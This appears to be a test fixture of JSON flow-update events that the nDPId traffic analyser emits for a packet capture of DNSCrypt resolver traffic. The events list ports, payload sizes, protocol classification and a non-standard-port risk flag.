+00835{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305194,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312133,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304360,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305460,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305349,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312102,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305331,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305461,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304806,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305187,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312181,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304804,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312178,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00836{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311306,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311312,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312180,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312106,"flow_last_seen":946739312136,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311313,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00836{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304393,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304394,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
